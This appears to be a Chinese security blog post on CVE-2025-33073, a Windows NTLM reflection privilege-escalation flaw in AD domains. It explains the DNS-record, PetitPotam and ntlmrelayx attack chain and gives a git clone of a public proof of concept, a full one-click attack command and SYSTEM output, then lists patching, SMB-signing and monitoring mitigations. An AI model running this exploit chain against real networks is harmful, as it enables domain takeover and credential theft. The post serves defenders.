微软重大漏洞来袭! CVE-2025-33073漏洞引爆全球Windows AD域沦陷危机

⚠️ 漏洞核心风险,仅需普通域用户凭证,攻击者即可远程接管域内所有非域控主机,全域沦陷倒计时启动!

    漏洞关键点:

  1. 利用门槛极低

    普通域用户权限+未启用SMB签名的Windows主机(90%企业内网默认状态)。

  2. 攻击后果致命

    直接获取NT AUTHORITY\SYSTEM权限,可远程执行任意代码、导出SAM哈希、横向扩散。

  3. 影响范围广泛

    涵盖Windows Server 2008~2025Windows 10/11全版本(除域控外)。


    ⚡ 漏洞技术原理(精简版)

    攻击者通过恶意DNS记录+强制认证触发,绕过微软NTLM反射防护,实现权限跃升:

  1. DNS投毒

    注册特殊格式DNS记录(如srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA),指向攻击者IP。

  2. 强制认证

    利用PetitPotam工具强制lsass.exe(SYSTEM权限)向恶意服务器发起认证。

  3. 认证反射

    通过ntlmrelayx.py将认证中继回目标主机,触发本地NTLM认证缺陷,注入SYSTEM令牌。

  4. 权限收割

    借助高权限令牌远程导出SAM或执行命令(如添加后门)。

📌 致命缺陷
当DNS名称与机器名匹配时,系统误判为“本地认证”(NTLMSSP_NEGOTIATE_LOCAL_CALL),导致防护失效。


    🛠️ 模拟攻击复现(Kali环境)(本文模拟测试仅用于合法授权环境,严禁非法渗透)

    工具准备:

git clone https://github.com/mverschu/CVE-2025-33073  cd CVE-2025-33073  pip install -r requirements.txt  # 依赖:impacket, dnspython    

图片

图片

    一键攻击命令:

python3 CVE-2025-33073.py \    -u 'PowerShell\user01' \    # 普通域账号    -p 'password' \    --attacker-ip 192.168.178.49 \   # 攻击者IP    --dns-ip 192.168.178.138 \       # 域控制器IP    --dc-fqdn DC01.PowerShell.com.cn \  # 域控FQDN    --target CLIENT01.PowerShell.com.cn \ # 目标主机    --target-ip 192.168.178.65 \    --cli-only \                      # CLI模式    --custom-command "whoami"         # 执行命令(返回SYSTEM)成功标志:[*] Authenticating against smb://CLIENT01.PowerShell.com.cn as / SUCCEED  [*] Executing command: whoami  NT AUTHORITY\SYSTEM  # 确认权限提升成功!

    🛡️ 紧急处置建议

    1️⃣ 立即打补丁

  • 安装微软2025年6月补丁(KB5039211)。

  • 手动下载链接:

    2️⃣ 强制SMB签名(治本方案):

    组策略路径:  
    计算机配置 → 策略 → Windows设置 → 安全设置 → 本地策略 → 安全选项  
→ “Microsoft网络服务器: 对通信进行数字签名(始终)” → 启用

    3️⃣ 攻击面收敛

  • 禁用非必要RPC服务(如Print Spooler、EFSRPC):
    sc.exe config Spooler start=disabled
  • 限制DNS记录修改权限,监控异常主机名注册。

    4️⃣ 深度监控

  • 审计事件ID 4624(登录)、4688(进程创建),捕捉PetitPotamntlmrelayx特征。

  • 部署网络层检测:扫描未签名SMB会话及畸形DNS查询(如超长A记录)。


    💎 总结

    CVE-2025-33073是近十年最具破坏力的Windows域渗透漏洞之一,其“低门槛+高权限”特性将导致企业内网面临“雪崩式沦陷”风险。补丁+SMB签名双管齐下是唯一根治方案,延迟修复等于为攻击者敞开大门!

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚拟化爱好者

创作不易

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值